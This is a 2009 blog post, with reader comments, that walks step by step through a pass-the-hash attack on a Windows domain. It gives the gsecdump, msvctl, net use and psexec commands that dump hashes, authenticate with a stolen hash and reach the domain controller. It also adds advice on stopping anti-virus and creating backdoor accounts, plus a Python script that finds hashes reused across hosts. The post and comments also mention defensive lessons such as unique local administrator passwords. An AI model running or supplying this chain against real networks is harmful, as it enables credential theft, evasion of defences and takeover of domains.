2009
12.08

Passing the hash

This is a short tutorial on how an attacker could take control of your network. For the attack to work you need an account whose password is reused throughout the network, for example the local "Administrator" account; it is very common to recycle the password for this account on every machine. You also need access to a machine that has that account on it and is joined to the domain. If both of these factors are in place you are ready to begin.


Tools required for this attack

- Gsecdump.exe | Hash dumper

- Msvctl.exe | Similar to runas. This tool was created by Truesec and is used to start a runas-style session using a hash for authentication; it is essentially a modified SMB client that takes a hash instead of a password.

- Psexec.exe | Microsoft (Sysinternals) tool for remote execution

Each of these tools is readily available online.

Step 1

Fire up a command prompt and run the gsecdump tool:

C:\gsecdump.exe -a   (-a dumps all secrets, including the account hashes)

[image001: gsecdump output listing the account hashes]
You should see the hashes as shown above.

Copy the hashes into your favourite text editor and reformat the required hash so it is contained on one line with no spaces. Each line has the pwdump layout user:RID:LM hash:NT hash:::; in this case we are interested in the local Administrator account (RID 500):

Administrator(current):500:7dee762647704278695109ab020e401c:85a1bacace8f32e71c491d6d9f53a2c5:::

Step 2

We want to run the msvctl.exe tool. It does a similar job to runas, but we are able to specify a hash instead of credentials; the command below launches a new cmd session in which we are authenticated as the local Administrator (the hash line is one argument and must be typed without a line break):

C:\msvctl.exe Administrator(current):500:7dee762647704278695109ab020e401c:85a1bacace8f32e71c491d6d9f53a2c5::: run cmd

[image003: new cmd session started by msvctl.exe]
You will then be given a new command prompt shell; this shell is now pre-authenticated with the local "Administrator" account's hash.

Step 3

Your new command prompt shell should allow you to create an SMB (NetBIOS) session to any node that happens to have the same local "Administrator" account with the same password; the net use below maps the C$ administrative share:

C:\net use \\192.168.31.45\c$

[image005: net use succeeding against 192.168.31.45]
The shell we opened with the msvctl.exe tool has now successfully authenticated to the remote machine using only the hash.

Step 4

Now that we have an SMB session set up we can run a handy tool called psexec.exe, a Microsoft (Sysinternals) tool that lets us run programs on the remote machine over that session:

C:\psexec.exe \\192.168.31.45 -c gsecdump.exe -a   (-c copies the file to the target before running it)

[image007: gsecdump output from 192.168.31.45]
We have now remotely dumped another machine's hashes, including the domain logon James.Brown.

NOTE: in the step above we ran gsecdump.exe through psexec, but you can run almost anything, including cmd, which gives you a fully interactive command prompt on the target; very handy if you need to kill services such as anti-virus or the firewall.

Step 5

Next we repeat the previous steps using the hash for James.Brown (who happens to be a Domain Admin):

C:\msvctl.exe James.Brown::7dee762647704278695109ab020e401c:85a1bacace8f32e71c491d6d9f53a2c5:::

C:\net use \\192.168.31.1\c$   (our domain controller)

C:\psexec.exe \\192.168.31.1 -c gsecdump.exe -a   (use pwdump4 if gsecdump fails)

[image009: gsecdump output from the domain controller]

You now have the hashes for every user in that domain from the domain controller, and can do anything else you like while the session is up: for example fire up a cmd shell on the DC, add yourself a new user whose password you know, and then open a remote desktop session.
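The chain above collects dumps from several hosts and only works because one NT hash is valid on more than one of them. The Python below is an added example, not code from the original post or from the gsecdump, msvctl or psexec authors: it parses pwdump-style lines of the kind gsecdump prints (rejoining a hash that has been wrapped over two lines, as in Step 2), rebuilds the one-line form that msvctl.exe is given, and reports which NT hashes appear on more than one host and which accounts still have an LM hash stored. The three host dumps, the hostnames and every hash in them are constructed for this example and do not come from any real system.

```python
import re
from collections import defaultdict

# Hashes of the empty password. A stored LM hash equal to EMPTY_LM means no
# LM hash is kept for that account (LM storage disabled or password > 14 chars).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump layout as printed by gsecdump: user[(tag)]:RID:LM:NT:::
# gsecdump tags the live entry "(current)" and history entries "(hist_N)";
# the RID may be blank for a cached domain logon.
HASH_LINE = re.compile(
    r"^(?P<user>[^:()]+)(?:\((?P<tag>[^)]*)\))?"
    r":(?P<rid>\d*):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)


def parse_dump(text):
    """Return one dict per hash line, rejoining lines a text editor has wrapped."""
    records, pending = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.endswith(":::"):
            pending += line  # first half of a wrapped hash line, or a banner
            continue
        m = HASH_LINE.match(pending + line) or HASH_LINE.match(line)
        pending = ""
        if not m:
            continue  # not a hash line (banner, error text)
        records.append({
            "user": m["user"],
            "tag": m["tag"] or "",
            "rid": int(m["rid"]) if m["rid"] else None,
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
        })
    return records


def as_one_line(rec):
    """Format a record back into the single-line argument msvctl.exe is given."""
    tag = f"({rec['tag']})" if rec["tag"] else ""
    rid = "" if rec["rid"] is None else str(rec["rid"])
    return f"{rec['user']}{tag}:{rid}:{rec['lm']}:{rec['nt']}:::"


def find_reuse(dumps):
    """Map each NT hash seen on two or more hosts to the (host, user) pairs using it.

    dumps: {hostname: gsecdump output}. History and empty-password entries are
    ignored; each result is a set of logons one stolen hash is good for.
    """
    by_nt = defaultdict(set)
    for host, text in dumps.items():
        for rec in parse_dump(text):
            if rec["tag"] not in ("", "current") or rec["nt"] == EMPTY_NT:
                continue
            by_nt[rec["nt"]].add((host, rec["user"]))
    return {
        nt: sorted(users)
        for nt, users in by_nt.items()
        if len({host for host, _ in users}) >= 2
    }


def lm_stored(dumps):
    """Accounts whose LM hash is present, i.e. LM hash storage is still enabled."""
    found = set()
    for host, text in dumps.items():
        for rec in parse_dump(text):
            if (rec["tag"] in ("", "current")
                    and rec["lm"] != EMPTY_LM and rec["nt"] != EMPTY_NT):
                found.add((host, rec["user"]))
    return sorted(found)


# Constructed sample dumps for three assumed hosts (not real hashes): the local
# Administrator password is shared by WS01 and WS02 but not WS03, and the
# James.Brown line on WS02 has been wrapped the way Step 2 shows.
SAMPLE_DUMPS = {
    "WS01": """\
Administrator(current):500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Administrator(hist_1):500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000001:::
Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
""",
    "WS02": """\
Administrator(current):500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
James.Brown::aad3b435b51404eeaad3b435b51404ee:1111222233334444
5555666677778888:::
""",
    "WS03": """\
Administrator(current):500:aad3b435b51404eeaad3b435b51404ee:ffffffffffffffffffffffffffffffff:::
""",
}

if __name__ == "__main__":
    for nt, where in find_reuse(SAMPLE_DUMPS).items():
        print(nt, "->", ", ".join(f"{h}\\{u}" for h, u in where))
    for host, user in lm_stored(SAMPLE_DUMPS):
        print("LM hash stored:", f"{host}\\{user}")
```

Run against real dumps, find_reuse is the list of machines a single captured hash opens (the attacker's view) and, equally, the list of accounts a defender has to give unique passwords; lm_stored flags machines where the weaker LM hash is still being kept alongside the NT hash.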

Additional note: most anti-virus software should pick up gsecdump when it is copied to a remote machine, so the attacker may hit a setback, but once he or she has a session to the remote machine as local administrator there is not a lot stopping them from finding and stopping the anti-virus service from the command line, uploading gsecdump, and enabling the service again afterwards.

Please feel free to leave any comments or suggestions. If you want to give it a go, it is very simple to lab up with a few VM images and some 30-day trials of Windows.

Grim F4ilure


4 comments so far

  1. Scary how simple yet powerful this is!

  2. Yeah, it just goes to show how seriously you should take endpoint security, and it is a very valid reason not to use recycled service accounts. As I mentioned, most client AV scanners may detect tools such as gsecdump being copied to the remote client, but since the attacker can fire up an interactive CMD.exe remotely and then stop services such as AV, or, if the AV does not allow the service to be stopped, simply change the default start-up type for the service from automatic to manual or disabled and then kill the AV process, this will stop the AV from starting a new process and detecting the attacker's tools. There are ways around anything, but I feel this demonstrates how simple it can be to take control of a domain in the right circumstances.

    I also wanted to point out that I mentioned dumping the hashes from the SAM on the domain controller; although the DC does not directly use the SAM for the domain authentication process, it is still used for some restore modes and is therefore still populated with the domain users' hashes.

  3. One other point to mention, which I think you know but for the benefit of others reading this, is that Vista (and Windows 7, I believe, is the same) forces you to create a user account when you set up the machine, which becomes a member of the Administrators group, and then disables the Administrator account. This is good in some ways as it stops this recycling of the Administrator account among machines on the network.

  4. Yeah, that is correct. Marcus Murray from Truesec, who demonstrated this attack some time back, also mentioned that on Vista the local Administrator account is disabled by default, so I assume it applies to Windows 7 too, but it can still be enabled and you can be sure people still do it.